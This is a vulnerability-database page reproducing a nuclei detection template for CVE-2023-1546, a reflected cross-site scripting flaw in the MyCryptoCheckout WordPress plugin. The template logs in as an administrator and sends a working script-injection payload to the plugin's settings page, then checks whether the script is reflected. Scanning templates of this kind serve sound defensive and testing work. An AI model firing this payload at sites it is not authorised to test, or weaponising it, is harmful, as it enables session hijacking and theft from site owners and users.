Lucene search
K

MyCryptoCheckout < 2.124 - Cross-Site Scripting

🗓️ 03 Jul 2026 13:39:16Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 37 Views

MyCryptoCheckout < 2.124 - Cross-Site Scripting. The WordPress plugin allows Reflected Cross-Site Scripting due to unescaped URLs in attributes

Related
Refs
Code
ReporterTitlePublishedViews
Family
CNNVD
WordPress plugin MyCryptoCheckout 跨站脚本漏洞
2 May 202300:00
cnnvd
CVE
CVE-2023-1546
2 May 202307:05
cve
Cvelist
CVE-2023-1546 MyCryptoCheckout < 2.124 - Reflected XSS
2 May 202307:05
cvelist
NVD
CVE-2023-1546
2 May 202308:15
nvd
OSV
CVE-2023-1546
2 May 202308:15
osv
Patchstack
WordPress MyCryptoCheckout Plugin < 2.124 is vulnerable to Cross Site Scripting (XSS)
14 Apr 202300:00
patchstack
Prion
Cross site scripting
2 May 202308:15
prion
Positive Technologies
PT-2023-17066 · WordPress · Mycryptocheckout
2 May 202300:00
ptsecurity
RedhatCVE
CVE-2023-1546
23 May 202502:54
redhatcve
Vulnrichment
CVE-2023-1546 MyCryptoCheckout < 2.124 - Reflected XSS
2 May 202307:05
vulnrichment
Rows per page
id: CVE-2023-1546

info:
  name: MyCryptoCheckout < 2.124 - Cross-Site Scripting
  author: Harsh
  severity: medium
  description: |
    The MyCryptoCheckout WordPress plugin before 2.124 does not escape some URLs before outputting them in attributes, leading to Reflected Cross-Site Scripting.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
  remediation: Fixed in version 2.124
  reference:
    - https://wpscan.com/vulnerability/bb065397-370f-4ee1-a2c8-20e4dc4415a0
    - https://nvd.nist.gov/vuln/detail/CVE-2023-1546
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2023-1546
    cwe-id: CWE-79
    epss-score: 0.0085
    epss-percentile: 0.53661
    cpe: cpe:2.3:a:plainviewplugins:mycryptocheckout:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: plainviewplugins
    product: mycryptocheckout
    framework: wordpress
  tags: cve,cve2023,wordpress,wp,wp-plugin,xss,wpscan,authenticated,plainviewplugins,vuln

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In
      - |
        GET /wp-admin/options-general.php?page=mycryptocheckout&tab=autosettlements&"><script>alert(/XSS/)</script> HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code_2 == 200'
          - 'contains(header_2, "text/html")'
          - 'contains(body_2, "scriptalert(/XSS/)/script")'
          - 'contains(body_2, "mycryptocheckout")'
        condition: and
# digest: 4a0a00473045022100c714c0d5c326b0d34730f520815cb2cc60627d99bb2d30478668f14ae32ac12d022071f6d3dba170650c757fdc2903193538a23f04b5ae5a125eda3b6dce1d8f7ec5:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.8Medium risk
Vulners AI Score6.8
CVSS 3.16.1
EPSS0.0085
SSVC
37